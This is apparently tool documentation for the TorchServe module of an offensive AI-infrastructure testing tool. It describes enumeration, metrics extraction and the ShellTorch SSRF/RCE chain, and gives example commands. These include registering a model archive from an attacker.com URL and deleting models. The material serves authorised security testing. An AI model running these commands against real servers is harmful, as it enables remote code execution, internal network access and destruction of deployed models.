TorchServe
Enumerate and exploit PyTorch TorchServe model serving instances.
Overview
The torchserve module targets TorchServe's separate management, inference, and metrics APIs. The management API (default port 8081) is the primary attack surface, exposing model registration, scaling, and deletion. The --target flag points to the management API; use --inference-url and --metrics-url to override the inference (8080) and metrics (8082) ports.
The register subcommand tests the critical ShellTorch SSRF/RCE vector (CVE-2023-43654, CVE-2024-35195) that enables arbitrary code execution via malicious model archive registration.
Subcommands
Read-Only (no --force-exploit required)
| Subcommand |
Description |
enum |
List models from management API and check inference health |
models |
Detailed model info (handler, runtime, workers, batch size) |
metrics |
Prometheus metrics from metrics API |
Gated (requires --force-exploit)
| Subcommand |
Description |
predict |
Send prediction via inference API |
register |
Register model from URL (ShellTorch SSRF/RCE vector) |
scale |
Scale model workers (proves management write access) |
unregister |
Delete a model (proves destructive access) |
Flags
| Flag |
Required |
Description |
--target |
Yes |
Management API URL (default port 8081) |
--header |
No |
Custom HTTP headers. Repeatable. |
--inference-url |
No |
Override inference API URL (default: derived from target with port 8080) |
--metrics-url |
No |
Override metrics API URL (default: derived from target with port 8082) |
--model |
For models, predict, scale, unregister |
Model name |
--payload |
For predict |
JSON prediction payload |
--model-url |
For register |
URL of model archive (.mar) to register |
--min-workers |
For scale |
Minimum worker count (default: 1) |
Key Endpoints
Management API (port 8081)
| Endpoint |
Method |
Purpose |
/models |
GET |
List all registered models |
/models/<name> |
GET |
Detailed model info |
/models?url=<url> |
POST |
Register model from URL (SSRF vector) |
/models/<name>?min_worker=<n> |
PUT |
Scale workers |
/models/<name> |
DELETE |
Unregister model |
Inference API (port 8080)
| Endpoint |
Method |
Purpose |
/ping |
GET |
Health check |
/<model>/predictions |
POST |
Inference request |
Metrics API (port 8082)
| Endpoint |
Method |
Purpose |
/metrics |
GET |
Prometheus metrics |
ShellTorch Vulnerability
The register subcommand tests the ShellTorch attack chain:
- CVE-2023-43654 -- SSRF via model registration URL, allowing requests to internal services and cloud metadata endpoints
- CVE-2024-35195 -- arbitrary code execution through malicious model archive files
When the management API accepts a registration request from an external URL, it confirms the SSRF vector is exploitable.
Examples
# Enumerate models and health
./aipostex torchserve --target http://127.0.0.1:8081 enum
# Detailed model info
./aipostex torchserve --target http://127.0.0.1:8081 models --model resnet
# Extract metrics
./aipostex torchserve --target http://127.0.0.1:8081 metrics
# Test prediction (gated)
./aipostex torchserve --target http://127.0.0.1:8081 predict \
--model resnet --payload '{"data": "test"}' --force-exploit
# ShellTorch SSRF test (gated)
./aipostex torchserve --target http://127.0.0.1:8081 register \
--model-url http://attacker.com/test.mar --force-exploit
# Scale workers (gated)
./aipostex torchserve --target http://127.0.0.1:8081 scale \
--model resnet --min-workers 2 --force-exploit
# Unregister model (gated)
./aipostex torchserve --target http://127.0.0.1:8081 unregister \
--model resnet --force-exploit
Workflow Progression
discover network (discovers TorchServe on :8080/:8081)
-> torchserve enum (model listing, health)
-> torchserve models --model <name> (handler, workers)
-> torchserve metrics (operational data)
-> torchserve predict --model <name> (inference test, gated)
-> torchserve register --model-url <url> (ShellTorch SSRF, gated)